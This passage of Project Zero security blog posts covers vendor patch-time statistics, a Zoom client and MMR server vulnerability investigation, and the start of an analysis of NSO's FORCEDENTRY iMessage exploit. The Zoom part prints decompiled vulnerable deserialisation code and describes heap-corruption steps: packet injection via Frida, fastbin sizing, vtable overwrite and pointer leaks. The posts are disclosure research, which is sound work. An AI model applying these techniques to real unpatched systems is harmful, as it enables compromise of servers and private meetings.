63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux overall have reduced their time to fix during the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the others not represented on the chart have collectively cut their time to fix in more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period used 9 times (notably with half being by Microsoft), versus the slightly lower average of 12.5 in the other years

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor

Total bugs

Avg fix time

iOS

76

70

Android (Samsung)

10

72

Android (Pixel)

6

72

The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser

Bugs

Avg days from bug report to public patch

Avg days from public patch to release

Avg days from bug report to release

Chrome

40

5.3

24.6

29.9

WebKit

27

11.6

61.1

72.7

Firefox

8

16.6

21.1

37.8

Total

75

8.8

37.3

46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to "Avg days from public patch to release" column:

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, Webkit, and Chrome. The fact that Webkit is still on the higher end of the histogram tells us that most of their time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, with time from bug report to releasing a fix in the stable channel in 30 days. The time to patch is very fast here, with just an average of 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public is the bulk of the overall time window, though overall we still see the Chrome (blue) bars of the histogram toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest number of days to release a patch at 73 days. Their time to land the fix publicly is in the middle between Chrome and Firefox, but unfortunately this leaves a very long amount of time for opportunistic attackers to find the patch and exploit it prior to the fix being made available to users. This can be seen by the Apple (red) bars of the second histogram mostly being on the right side of the graph, and every one of them except one being past the 30-day mark.

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patch effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de-facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of use of grace periods as well as lack of missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

Zooming in on Zero-click Exploits

By: Ryan
18 January 2022 at 17:28

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox’s XMPP parser by extending the class StanzaExtension and implementing the method newInstance to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler class. Application developers extend this class, implementing the method handleMessage with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‘On’ that handle specific events. I spent a fair amount of time analyzing these code paths, but didn’t find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different than the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn’t load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don’t have source code available. Instead, I compiled my own fuzzing stub that called the function I wanted to fuzz as a relocatable that defined fopen, and loaded it using LD_PRELOAD when executing the MMR binary. Then my code would take control of execution the first time that the MMR binary called fopen, and was able to call the function being fuzzed.

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a great deal of packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains a great deal of classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t,  which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(

msg_db, &this->str_len, consume_bytes, error_out);

  str_len = this->str_len;

  if ( str_len )

  {

    mem = operator new[](str_len);

    out_len = 0;

    this->str_mem = mem;

    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db, mem, &out_len);

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db_t* msg, signed __int8 *mem,

unsigned int *len)

{

  if ( !msg->invalid )

  {

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);

    if ( !msg->invalid )

    {

      if ( *len )

        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read(msg, mem, *len, 0);

    }

  }

  return msg;

}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.

Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the class the vulnerability occurs in was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom’s public MMR servers, but it seems reasonably likely that the same code was also in Zoom’s public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

struct variant{

char type;

short length;

var_data data;

};

union var_data{

        char i8;

        char* i8_ptr;

        short i16;

        short* i16_ptr;

        int i32;

        int* i32_ptr;

        long long i64;

        long long i64*;

};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 four 64-bit). The length field specifies whether the variant is an array and its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer, an array of that size is read.

My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found that there are several locations where byte array variants are converted to strings, however not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.

 

I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but not as many where the attacker can trigger both allocation and freeing. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique users accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met this criteria, and since CVE-2021-34423 allows for the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.

The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes, however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent it was not possible to ascertain what heap data they pointed to with any accuracy.

One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers, meanwhile no other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially when the server lacked ASLR and supports modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time consuming. Using the features we tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.  

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software should consider how to make their software accessible to security researchers.

A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

By: Ryan
15 December 2021 at 17:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.

Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.

NSO

NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.

For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products" Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases.

Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."

Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.

From One to Zero

In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:

Screenshots of Phishing SMSs reported to Citizen Lab in 2016

source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.

One weird trick

The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.

iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:

  [IMGIFUtils copyGifFromPath:toDestinationPath:error]

Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.

The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.

Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.

A PDF in your GIF

NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.

PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...

Extreme compression

In the late 1990's, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain specific image codec designed to compress images where pixels can only be black or white.

It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the XEROX WorkCenter device shown below. If you used the scan to pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.

A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2

for its scan-to-pdf functionality

source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications

The PDFs files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:

Technique 1: Segmentation and substitution

Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:

Simple pattern matching can find all the shapes which look similar on a page,

in this case all the 'e's

JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition.) A JBIG encoder is just looking for connected regions of pixels and grouping similar looking regions together. The compression algorithm is to simply substitute all sufficiently-similar looking regions with a copy of just one of them:

Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios

In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.

There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.

Technique 2: Refinement coding

As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode.

It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:

Using the XOR operator on bitmaps to compute a difference image

In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.

